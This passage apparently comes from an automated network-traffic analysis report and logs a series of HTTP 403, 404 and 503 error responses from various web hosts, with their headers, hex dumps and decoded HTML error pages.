20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:07:40 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UGTmZ46FaRym%2FBt%2FnjR5LpJ7djnRfseopTd%2Fs4m7%2F50FDz072uwWlD4%2F9c5tpsfqmha6bmpuXbqdbBWRwysNmHAVcfQM9GMpZ5EewMvCI4tDl63gwCEVt4hoSO3NOg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7e1d6d78ab441961-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d Data Ascii: 119c<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 05 Jul 2023 06:07:25 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=20X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 3f9fa35a-001b-42e3-b45f-5b151de9bac2CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=6ES5O9OmK1faw9fEru2tw3yupoVDcv6Jv8Ep8A_7uuA-1688537245-0-AbMrsG1vEZ7q328C2c4/sxxnQDbuTW4DbfPaFL7bb+uKGtvoKFxGgNsj3wCQZ+mxWVzlnGeRZvPmWdtuY1UHXLg=; path=/; expires=Wed, 05-Jul-23 06:37:25 GMT; domain=.banvari.com; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BVGdl6wJLRYSJCBl8vQNsCEWn3p7IZpDqI1do%2BRrkHzaIWn8G85dCv8C9vx%2BIFphM4%2BS6E6ZUUGBZnejD7gDPKDZ%2F9Tz%2BmDbWdXe9VFSkE1a6Q5wx%2BrYsHuEVc5a"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.999929Server: cloudflareCF-RAY: 7e1d6d787bd02bea-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 05 Jul 2023 06:07:25 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:26 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfWOotv7Qhr82RarQR/hsnp,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1688537246.0993045340051992X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:27 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:28 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 22e80b45-122d-4d43-b7e9-dbb108e9813cCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pF30innkEIIX%2BPw%2FVm1kKRXmrNKdGvMaJN%2BLP3cDoOVhrIjYmEVC6EolNNPWaPHeeSnPJBdFvlF0nRp68TRce0YbHJ35e9%2BCyghg0%2Fxrgg7tgqnce8cK%2BUVsug6ErzoAMw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=149.999857Server: cloudflareCF-RAY: 7e1d6d949d7b1e20-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:31 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:32 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:35 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BdJgJ9cOgyRfMWY4OWJiNDE1YjU3Y2YzNDRiYzJhOWQ1ODM2NDk1;Path=/X-Contextid: KLDwdFNH/CvxnbivtData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:35 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: yxxXU2qz/B2fNd2ufData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 